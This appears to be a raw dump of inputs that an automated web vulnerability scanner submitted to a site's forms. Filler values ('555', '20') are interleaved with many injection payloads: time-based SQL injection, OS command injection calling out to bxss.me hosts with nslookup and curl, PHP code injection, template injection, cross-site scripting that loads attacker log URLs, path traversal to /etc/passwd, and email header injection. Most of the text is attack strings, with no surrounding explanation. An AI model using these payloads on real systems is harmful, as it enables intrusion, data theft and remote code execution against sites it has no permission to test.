555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
‘.print(md5(31337)).’
555
${@print(md5(31337))}
${@print(md5(31337))}
555
555
555
555
« ;print(md5(31337));$a= »
555
‘;print(md5(31337));$a=’
555
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
555
555
555
555
555
555
555
‘ »
555
555
<!–
555
555’||sleep(27*1000)*etwyrh||’
555
555
555″||sleep(27*1000)*psgvyn|| »
555
555
555
555
555
555
555″&&sleep(27*1000)*gtppoi&& »
555’&&sleep(27*1000)*yszbao&&’
555
‘ »()
555
555
555
Array
555
555
555
555
Array
555
555
555
555
555
555
555
555
Array
555
555
555
xfs.bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
;(nslookup -q=cname hithcnlmoggpd9e1c4.bxss.me||curl hithcnlmoggpd9e1c4.bxss.me)|(nslookup -q=cname hithcnlmoggpd9e1c4.bxss.me||curl hithcnlmoggpd9e1c4.bxss.me)&(nslookup -q=cname hithcnlmoggpd9e1c4.bxss.me||curl hithcnlmoggpd9e1c4.bxss.me)
555
555
`(nslookup -q=cname hitlwdbzaoekk1a065.bxss.me||curl hitlwdbzaoekk1a065.bxss.me)`
|(nslookup -q=cname hitinkprbcblq7884f.bxss.me||curl hitinkprbcblq7884f.bxss.me)
‘+’A’.concat(70-3).concat(22*4).concat(107).concat(72).concat(121).concat(87)+(require’socket’
Socket.gethostbyname(‘hitxv’+’gwaoelpgb7bcd.bxss.me.’)[3].to_s)+’
bxss.me/t/xss.html?
&(nslookup -q=cname hitkrjlnkdltib1963.bxss.me||curl hitkrjlnkdltib1963.bxss.me)&’ »`0&(nslookup -q=cname hitkrjlnkdltib1963.bxss.me||curl hitkrjlnkdltib1963.bxss.me)&`’
HttP://bxss.me/t/xss.html?
« + »A ».concat(70-3).concat(22*4).concat(116).concat(82).concat(116).concat(76)+(require »socket »
Socket.gethostbyname(« hitiw »+ »ojwsoryka4cdb.bxss.me. »)[3].to_s)+ »
555
555
&nslookup -q=cname hitewiomlkfrl6d184.bxss.me&’ »`0&nslookup -q=cname hitewiomlkfrl6d184.bxss.me&`’
555
555
555
555
$(nslookup -q=cname hitdtbnxzksxbd00fd.bxss.me||curl hitdtbnxzksxbd00fd.bxss.me)
555
bxss.me
555
555
555
(nslookup -q=cname hituixfwwcbzn2721f.bxss.me||curl hituixfwwcbzn2721f.bxss.me))
c:/windows/win.ini
555
555
555
555|echo tefhdn$() zkjglunz^xyu||a #’ |echo tefhdn$() zkjglunz^xyu||a #| » |echo tefhdn$() zkjglunz^xyu||a #
/etc/shells
555
555&echo uskjtj$() mdtywunz^xyu||a #’ &echo uskjtj$() mdtywunz^xyu||a #| » &echo uskjtj$() mdtywunz^xyu||a #
http://bxss.me/t/fit.txt.jpg
555
|echo ypkbbx$() swincenz^xyu||a #’ |echo ypkbbx$() swincenz^xyu||a #| » |echo ypkbbx$() swincenz^xyu||a #
555
555
Http://bxss.me/t/fit.txt
&echo ijovjc$() amylxonz^xyu||a #’ &echo ijovjc$() amylxonz^xyu||a #| » &echo ijovjc$() amylxonz^xyu||a #
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
echo yohpcs$() tzyccwnz^xyu||a #’ &echo yohpcs$() tzyccwnz^xyu||a #| » &echo yohpcs$() tzyccwnz^xyu||a #
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
« .gethostbyname(lc(« hitrg ». »lfvosnuf61ba2.bxss.me. »)). »A ».chr(67).chr(hex(« 58″)).chr(101).chr(81).chr(98).chr(78). »
555
555
‘.gethostbyname(lc(‘hithe’.’zzflwxtz251fe.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(101).chr(70).chr(104).chr(71).’
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
!(()&&!|*|*|
555
555
^(#$!@#$)(()))******
555
)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../555
555
555
555
555
555
555
555
555
file:///etc/passwd
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
Array
555
555
555
555
12345′ »‘ »);|]*{‘💡
555
555
555
555
555
555
555
${9999687+9999103}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
to@example.com>bcc:009247.390-22364.390.f595b.20103.2@bxss.me
555
555
555
555
555bcc:009247.390-22363.390.f595b.20103.2@bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
« +response.write(9816091*9826314)+ »
555
555
555
555
‘+response.write(9816091*9826314)+’
555
555
555
555
response.write(9816091*9826314)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
20
20
20
555
20
20
20
555
555
20
0″XOR(if(now()=sysdate(),sleep(15),0))XOR »Z
20
20
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
20
20
20
20
20
20
20
20
20
20
20
20
if(now()=sysdate(),sleep(15),0)
20
20
-1″ OR 2+799-799-1=0+0+0+1 —
-1′ OR 2+120-120-1=0+0+0+1 or ‘1UX177bG’=’
555
-1′ OR 2+253-253-1=0+0+0+1 —
-1 OR 2+816-816-1=0+0+0+1
-1 OR 2+21-21-1=0+0+0+1 —
555
555
555
@@X1GS4
1′ »
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
PUxo1ei5′)) OR 302=(SELECT 302 FROM PG_SLEEP(15))–
555
qyYcXYnC’) OR 148=(SELECT 148 FROM PG_SLEEP(15))–
555
VHqGGjHm’ OR 802=(SELECT 802 FROM PG_SLEEP(15))–
555
-1)) OR 363=(SELECT 363 FROM PG_SLEEP(15))–
555
-5) OR 246=(SELECT 246 FROM PG_SLEEP(15))–
555
-5 OR 371=(SELECT 371 FROM PG_SLEEP(15))–
555
jPmFSXN4′; waitfor delay ‘0:0:15’ —
555
20
1 waitfor delay ‘0:0:15’ —
555
20
20
-1); waitfor delay ‘0:0:15’ —
555
20
20
-1; waitfor delay ‘0:0:15’ —
20
20
20
555
20
20
20
20
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+’ »+(select(0)from(select(sleep(15)))v)+ »*/
20
555
20
0″XOR(if(now()=sysdate(),sleep(15),0))XOR »Z
20
555
20
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
20
555
20
if(now()=sysdate(),sleep(15),0)
20
555
20
-1″ OR 2+906-906-1=0+0+0+1 —
20
-1′ OR 2+992-992-1=0+0+0+1 or ‘QvPsKJ6I’=’
-1′ OR 2+524-524-1=0+0+0+1 —
-1 OR 2+611-611-1=0+0+0+1
-1 OR 2+848-848-1=0+0+0+1 —
555
555
555
555
555
555
20
555
20
555
20
555
20
555
555
555
555
20
555
555
555
555
20
555
20
555
20
555
20
555
20
20
20
20
20
20
555
20
20
555
20
20
20
20
20
555
555
20
555
20
20
20
20
555
20
20
20
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
555
555
555
555
555
20
555
555
555
555
555
555
20
555
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
555
20
555
20
555
20
555
555
555
555
20
555
555
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
20
20
20
20
555
20
20
555
20
20
20
20
20
555
555
20
20
20
555
20
20
555
20
20
20
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
20
555
555
555
555
555
555
555
555
555
555
555
555
20
20
555
555
20
20
555
555
555
555
555
555
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
20
20
20
555
20
20
555
20
20
20
20
20
20
555
555
555
555
20
555
555
555
555
555
555
555
20
555
20
555
20
20
20
555
20
20
20
20
555
555
555
20
555
555
555
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
555
20
20
20
20
555
20
20
20
20
20
20
20
20
555
555
20
20
555
555
20
20
20
20
20
20
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
555
555
555
555
555
555
555
555
555
555
20
20
555
555
20
20
555
555
555
555
555
555
555
20
555
20
555
20
555
20
555
20
555
20
555
555
20
20
20
20
20
20
20
20
20
20
20
20
555
555
20
20
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
20
20
555
555
20
20
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
20
20
20
555
555
dfb__${98991*97996}__::.x
20
20
dfb[[${98991*97996}]]xca
bfgx3351z1z2abcxhjl3351
20
20
dfb{{98991*97996}}xca
bfg1138s1s2s3hjl1138
20
1}} »}}’}}1%> »%>’%>
209761435
20
<th:t="${dfb}#foreach
‘ »()&%
20
20′ »()&%
20
bfgx3702z1z2abcxhjl3702
bfg2399s1s2s3hjl2399
20
209449682
20
‘ »()&%
20
20′ »()&%
20
20
@@1vXnG
1′ »
20’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
wT6LPO57′)) OR 509=(SELECT 509 FROM PG_SLEEP(15))–
20
20
20
20
clrtNHT6′) OR 274=(SELECT 274 FROM PG_SLEEP(15))–
20
XTQShg8p’ OR 211=(SELECT 211 FROM PG_SLEEP(15))–
20
-1)) OR 216=(SELECT 216 FROM PG_SLEEP(15))–
20
-5) OR 124=(SELECT 124 FROM PG_SLEEP(15))–
20
-5 OR 157=(SELECT 157 FROM PG_SLEEP(15))–
20
GCJWIUst’; waitfor delay ‘0:0:15’ —
20
1 waitfor delay ‘0:0:15’ —
20
-1); waitfor delay ‘0:0:15’ —
20
-1; waitfor delay ‘0:0:15’ —
20
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+’ »+(select(0)from(select(sleep(15)))v)+ »*/
20
20
20
20
20
20
0″XOR(if(now()=sysdate(),sleep(15),0))XOR »Z
20
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
@@3G0zh
1′ »
20’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
if(now()=sysdate(),sleep(15),0)
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-1″ OR 2+389-389-1=0+0+0+1 —
-1′ OR 2+874-874-1=0+0+0+1 or ‘6VVLpcnC’=’
-1′ OR 2+333-333-1=0+0+0+1 —
-1 OR 2+192-192-1=0+0+0+1
-1 OR 2+852-852-1=0+0+0+1 —
20
XRUR6jVF’)) OR 995=(SELECT 995 FROM PG_SLEEP(15))–
20
e8HSKVz9′) OR 88=(SELECT 88 FROM PG_SLEEP(15))–
20
20
20
20
dUuR2l4y’ OR 26=(SELECT 26 FROM PG_SLEEP(15))–
20
-1)) OR 692=(SELECT 692 FROM PG_SLEEP(15))–
20
-5) OR 335=(SELECT 335 FROM PG_SLEEP(15))–
20
20
20
-5 OR 654=(SELECT 654 FROM PG_SLEEP(15))–
20
20
20
20
20
20
e9GAuJry’; waitfor delay ‘0:0:15’ —
20
20
20
20
20
20
20<aUaYVfQ<
20
1 waitfor delay ‘0:0:15’ —
20
20<img sRc='http://attacker-9841/log.php?
20
20<aEsIL0i<
20
20<img sRc='http://attacker-9382/log.php?
20
20
20
20
20
20
20
20
203LRFW[!+!]
20
20
20
2071MI7[!+!]
20kMa32
20
20k32X3
20
20}body{zzz:Expre/**/SSion(JBeB(9776))}
20
-1); waitfor delay ‘0:0:15’ —
20}body{zzz:Expre/**/SSion(utpC(9328))}
20
20
20
20
20
20
20
20
20
20
20
20<ScRiPt>JBeB(9152)</sCripT>
20
20
20<ScRiPt>utpC(9336)</sCripT>
20u003CScRiPtJBeB(9884)u003C/sCripTu003E
-1; waitfor delay ‘0:0:15’ —
20
20
20u003CScRiPtutpC(9186)u003C/sCripTu003E
9670
20
20
20
9000
20
20
20
20
20
20
20
20
20
20
20
20
20
20
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+’ »+(select(0)from(select(sleep(15)))v)+ »*/
20
20
20
20
20
20
20
20
20
20
20
20
20JBeB(9644)
20
20
555
555
20utpC(9468)
20
555
555
20
20
0″XOR(if(now()=sysdate(),sleep(15),0))XOR »Z
20
20
20
20
20
20
20
20
20
20
20
20
20
20R6NHW[!+!]
20
20
20
20
20B1QY0[!+!]
20
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
555
20
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
20
20
dfb__${98991*97996}__::.x
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20
dfb[[${98991*97996}]]xca
20
20
dfb__${98991*97996}__::.x
dfb{{98991*97996}}xca
20
dfb[[${98991*97996}]]xca
1}} »}}’}}1%> »%>’%>
dfb{{98991*97996}}xca
20
<th:t="${dfb}#foreach
1}} »}}’}}1%> »%>’%>
20
<th:t="${dfb}#foreach
555
20
if(now()=sysdate(),sleep(15),0)
bfgx3263z1z2abcxhjl3263
20
bfg5102s1s2s3hjl5102
bfgx7632z1z2abcxhjl7632
20
20
209042296
bfg2317s1s2s3hjl2317
20
‘ »()&%
209219975
20
20′ »()&%
‘ »()&%
20
-1″ OR 2+524-524-1=0+0+0+1 —
555
-1′ OR 2+731-731-1=0+0+0+1 or ‘lnqaCvrw’=’
20′ »()&%
20
-1′ OR 2+226-226-1=0+0+0+1 —
-1 OR 2+85-85-1=0+0+0+1
-1 OR 2+938-938-1=0+0+0+1 —
20
20
555
20
20
555
20
20
20
20
20
555
20
20
20
20
20
20
20
555
20
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
555
555
555
555
555
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20<a1HWpj2<
20
20<img sRc='http://attacker-9523/log.php?
20
20
20
20
20
20USIKC[!+!]
20
208hhxt
20
20
20
20
20
20
20}body{zzz:Expre/**/SSion(SN9Y(9998))}
20
20
20
20
20
20
20<ScRiPt>SN9Y(9394)</sCripT>
20
20
20u003CScRiPtSN9Y(9642)u003C/sCripTu003E
20
9426
20
20
20
20
20
20<aI3MbJJ<
20
20
20
20<img sRc='http://attacker-9840/log.php?
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20T2XVX[!+!]
20
20
20IrgLi
20SN9Y(9609)
20
20
20}body{zzz:Expre/**/SSion(0Nks(9530))}
20
20
20
20
20
20
20
20
20
20
20
20
20
20RVNZ3[!+!]
20
20<ScRiPt>0Nks(9733)</sCripT>
20
20
20u003CScRiPtNks(9183)u003C/sCripTu003E
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
9601
20
dfb__${98991*97996}__::.x
20
20
20
20
dfb[[${98991*97996}]]xca
20
20
20
20
dfb{{98991*97996}}xca
20
1}} »}}’}}1%> »%>’%>
20
20
20
<th:t="${dfb}#foreach
20
20
20
bfgx4571z1z2abcxhjl4571
20
20
20
bfg2309s1s2s3hjl2309
20
209059594
200Nks(9614)
20
‘ »()&%
20
20
20′ »()&%
20
20
20
20
20
20
20
20
20UPGB3[!+!]
20
20
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20
20
dfb__${98991*97996}__::.x
20
dfb[[${98991*97996}]]xca
20
dfb{{98991*97996}}xca
20
20
1}} »}}’}}1%> »%>’%>
20
<th:t="${dfb}#foreach
20
20
20
bfgx8118z1z2abcxhjl8118
20
bfg9255s1s2s3hjl9255
20
209393107
20
20
‘ »()&%
20
20′ »()&%
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20<arh7CCi<
20
20
20<aVQzMqq<
20<img sRc='http://attacker-9839/log.php?
20
20<img sRc='http://attacker-9231/log.php?
20
20
20
20
20
20
20COEUT[!+!]
20
20
20J2Sbk
20TP8UE[!+!]
20
2093nrC
20
20}body{zzz:Expre/**/SSion(u72n(9351))}
20
20
20
20}body{zzz:Expre/**/SSion(hynf(9742))}
20
20
20
20
20
20
20
20<ScRiPt>u72n(9773)</sCripT>
20
20
20<ScRiPt>hynf(9604)</sCripT>
20u003CScRiPtu72n(9614)u003C/sCripTu003E
20
9652
20u003CScRiPthynf(9821)u003C/sCripTu003E
20
9648
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20u72n(9145)
20
20hynf(9948)
20
20
20
20
20
20
20
20
20
20
20
20
20SJNGF[!+!]
20
20
20
207TB2F[!+!]
20
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20
20
dfb__${98991*97996}__::.x
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
20
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
20
20
20
1}} »}}’}}1%> »%>’%>
dfb{{98991*97996}}xca
20
20
<th:t="${dfb}#foreach
1}} »}}’}}1%> »%>’%>
20
20
20
<th:t="${dfb}#foreach
20<a2RpbiQ<
20
20
bfgx1062z1z2abcxhjl1062
20<a01UFRw<
20<img sRc='http://attacker-9280/log.php?
20
20
20<aPCJbwO<
bfg9241s1s2s3hjl9241
bfgx8848z1z2abcxhjl8848
20<img sRc='http://attacker-9189/log.php?
20
20
209163214
20
20<img sRc='http://attacker-9424/log.php?
bfg3955s1s2s3hjl3955
20
20
‘ »()&%
209954361
20
20
20
20
20
20YOCEA[!+!]
‘ »()&%
20
20
20
20′ »()&%
20
20N1OG(9137)
20
20<ScRiPt>Zax9(9860)</sCripT>
20<ScRiPt>Lh2o(9447)</sCripT>
20
20
20
20u003CScRiPtZax9(9600)u003C/sCripTu003E
20u003CScRiPtLh2o(9771)u003C/sCripTu003E
20
20
9696
9222
20
20
20
20
20
20
20
20
20
20VQBQ0[!+!]
20
20
20
20
20
20
20
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20
20
20
dfb__${98991*97996}__::.x
20
20
20
20
dfb[[${98991*97996}]]xca
20
dfb{{98991*97996}}xca
20
20Zax9(9815)
20Lh2o(9365)
1}} »}}’}}1%> »%>’%>
20
20
20
<th:t="${dfb}#foreach
20
20
20
20
20
20
20
bfgx3840z1z2abcxhjl3840
20
20
20
bfg6081s1s2s3hjl6081
20
20S3BJI[!+!]
20
209063454
20SXNFT[!+!]
20
20
20
20
‘ »()&%
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20
20
20′ »()&%
dfb__${98991*97996}__::.x
20
dfb__${98991*97996}__::.x
20
dfb[[${98991*97996}]]xca
20
dfb[[${98991*97996}]]xca
20
dfb{{98991*97996}}xca
20
20
dfb{{98991*97996}}xca
20
1}} »}}’}}1%> »%>’%>
1}} »}}’}}1%> »%>’%>
20
20
<th:t="${dfb}#foreach
<th:t="${dfb}#foreach
20
20
20
20
20
bfgx1732z1z2abcxhjl1732
bfgx10452z1z2abcxhjl10452
20
20
bfg3602s1s2s3hjl3602
20
bfg3429s1s2s3hjl3429
20
20
209903977
209217271
20
‘ »()&%
‘ »()&%
20′ »()&%
20
20′ »()&%
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20<aSBUXLs<
20
20<img sRc='http://attacker-9662/log.php?
20
20
20
20
20
20NIGAF[!+!]
20SyCVW
20
20}body{zzz:Expre/**/SSion(9gtH(9092))}
20
20
20<ScRiPt>9gtH(9021)</sCripT>
20
20
20
20u003CScRiPt9gtH(9451)u003C/sCripTu003E
20
9597
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
209gtH(9089)
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20XHJBB[!+!]
20
20
20
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20
20
20
dfb__${98991*97996}__::.x
20
20
dfb[[${98991*97996}]]xca
20
20
dfb{{98991*97996}}xca
20
20
20
1}} »}}’}}1%> »%>’%>
20
20
<th:t="${dfb}#foreach
20
20
20
20
bfgx10667z1z2abcxhjl10667
20
20
bfg2883s1s2s3hjl2883
20
20
20
209468819
20
20
20
‘ »()&%
20
20
20′ »()&%
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20′
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20
20
dfb__${98991*97996}__::.x
20′
20
20
dfb[[${98991*97996}]]xca
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20
dfb{{98991*97996}}xca
dfb__${98991*97996}__::.x
20
1}} »}}’}}1%> »%>’%>
dfb[[${98991*97996}]]xca
20
<th:t="${dfb}#foreach
dfb{{98991*97996}}xca
20
20
1}} »}}’}}1%> »%>’%>
20
20
20
bfgx6317z1z2abcxhjl6317
<th:t="${dfb}#foreach
20
20
bfg8779s1s2s3hjl8779
20
bfgx1533z1z2abcxhjl1533
20
bfg2751s1s2s3hjl2751
20
20
20
20
20
20
20
20
20
20
20
209257903
20
‘ »()&%
20′ »()&%
209796651
20
‘ »()&%
20
20′ »()&%
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20<aoJB6uF<
20
20<aqDFFtS<
20
20<img sRc='http://attacker-9030/log.php?
20
20
20<img sRc='http://attacker-9260/log.php?
20
20
20
20
20
20
20
20
20TNXB0[!+!]
20
20P3YAB[!+!]
20
20mdG5i
20
20Qmx8S
20
20}body{zzz:Expre/**/SSion(1XAy(9657))}
20
20
20
20}body{zzz:Expre/**/SSion(fQkL(9548))}
20
20
20
20
20
20
20
20<aFUmBT6<
20
20
20
20<img sRc='http://attacker-9308/log.php?
20
20
20<ScRiPt>1XAy(9235)</sCripT>
20
20
20<ScRiPt>fQkL(9609)</sCripT>
20
20u003CScRiPt1XAy(9830)u003C/sCripTu003E
20
20
20LSW7G[!+!]
20
20u003CScRiPtfQkL(9680)u003C/sCripTu003E
20pmzxV
9265
20
20}body{zzz:Expre/**/SSion(IdT1(9386))}
20
9559
20
20
20
20
20
20
20
20
20
20
20
20<ScRiPt>IdT1(9061)</sCripT>
20
20
20
20
20
20u003CScRiPtIdT1(9515)u003C/sCripTu003E
20
20
20
20
9632
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
201XAy(9695)
20
20fQkL(9831)
20
20
20
20
20
20
20IdT1(9065)
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20HNBWZ[!+!]
20XVRKP[!+!]
20
20
20KOG91[!+!]
20
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20
20
dfb__${98991*97996}__::.x
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
dfb[[${98991*97996}]]xca
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20
dfb__${98991*97996}__::.x
dfb{{98991*97996}}xca
20
20
dfb__${98991*97996}__::.x
1}} »}}’}}1%> »%>’%>
dfb[[${98991*97996}]]xca
20
<th:t="${dfb}#foreach
dfb[[${98991*97996}]]xca
20
dfb{{98991*97996}}xca
20
bfgx5089z1z2abcxhjl5089
dfb{{98991*97996}}xca
20
1}} »}}’}}1%> »%>’%>
20
bfg4811s1s2s3hjl4811
1}} »}}’}}1%> »%>’%>
209172431
20
<th:t="${dfb}#foreach
20
‘ »()&%
<th:t="${dfb}#foreach
20
20
20′ »()&%
20
20
bfgx1981z1z2abcxhjl1981
20
20
20
20
bfgx8043z1z2abcxhjl8043
20
20
20
bfg10445s1s2s3hjl10445
20
20
20
20
20
bfg2797s1s2s3hjl2797
20
209206698
209839901
‘ »()&%
20
20
20
‘ »()&%
20
20′ »()&%
20
20′ »()&%
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
‘.print(md5(31337)).’
20
${@print(md5(31337))}
${@print(md5(31337))}
« ;print(md5(31337));$a= »
‘;print(md5(31337));$a=’
20
20
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
20
20
20
20
20
20
20
<!–
‘ »
20
20
20
20
20
20
20
;(nslookup -q=cname hitgbzhradudv17a52.bxss.me||curl hitgbzhradudv17a52.bxss.me)|(nslookup -q=cname hitgbzhradudv17a52.bxss.me||curl hitgbzhradudv17a52.bxss.me)&(nslookup -q=cname hitgbzhradudv17a52.bxss.me||curl hitgbzhradudv17a52.bxss.me)
20
../20
20
`(nslookup -q=cname hitlliyxpkvje20185.bxss.me||curl hitlliyxpkvje20185.bxss.me)`
|(nslookup -q=cname hitapfffmfcrtb021f.bxss.me||curl hitapfffmfcrtb021f.bxss.me)
20
20
&(nslookup -q=cname hitsbcwbhgbzl87138.bxss.me||curl hitsbcwbhgbzl87138.bxss.me)&’ »`0&(nslookup -q=cname hitsbcwbhgbzl87138.bxss.me||curl hitsbcwbhgbzl87138.bxss.me)&`’
20
20
file:///etc/passwd
20
‘+’A’.concat(70-3).concat(22*4).concat(121).concat(70).concat(119).concat(69)+(require’socket’
Socket.gethostbyname(‘hitda’+’gptahsrl9c07e.bxss.me.’)[3].to_s)+’
&nslookup -q=cname hitelpcnhnrsj43385.bxss.me&’ »`0&nslookup -q=cname hitelpcnhnrsj43385.bxss.me&`’
20
../../../../../../../../../../../../../../windows/win.ini
20
« + »A ».concat(70-3).concat(22*4).concat(120).concat(80).concat(115).concat(68)+(require »socket »
Socket.gethostbyname(« hitoa »+ »nptzzvvg5f916.bxss.me. »)[3].to_s)+ »
$(nslookup -q=cname hitqkbcuuuxhgf3e72.bxss.me||curl hitqkbcuuuxhgf3e72.bxss.me)
20
20
../../../../../../../../../../../../../../etc/passwd
20
(nslookup -q=cname hittwsfjwuzbm84efa.bxss.me||curl hittwsfjwuzbm84efa.bxss.me))
20
20|echo hrtlyr$() wmozvwnz^xyu||a #’ |echo hrtlyr$() wmozvwnz^xyu||a #| » |echo hrtlyr$() wmozvwnz^xyu||a #
20
20
20
bxss.me/t/xss.html?
20
20
|echo pidlic$() pqotsxnz^xyu||a #’ |echo pidlic$() pqotsxnz^xyu||a #| » |echo pidlic$() pqotsxnz^xyu||a #
20
20
20&echo nbcgzv$() tjpentnz^xyu||a #’ &echo nbcgzv$() tjpentnz^xyu||a #| » &echo nbcgzv$() tjpentnz^xyu||a #
HttP://bxss.me/t/xss.html?
20
20
20
20
20
20
&echo bcdjhw$() hpculonz^xyu||a #’ &echo bcdjhw$() hpculonz^xyu||a #| » &echo bcdjhw$() hpculonz^xyu||a #
20
echo cidvnq$() fpqbwsnz^xyu||a #’ &echo cidvnq$() fpqbwsnz^xyu||a #| » &echo cidvnq$() fpqbwsnz^xyu||a #
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
bxss.me
20
20
20
20
20
xfs.bxss.me
20
20
c:/windows/win.ini
20
20
/etc/shells
20
20
20
20
http://bxss.me/t/fit.txt.jpg
20
20
20
20
20
Http://bxss.me/t/fit.txt
20
20
20
20
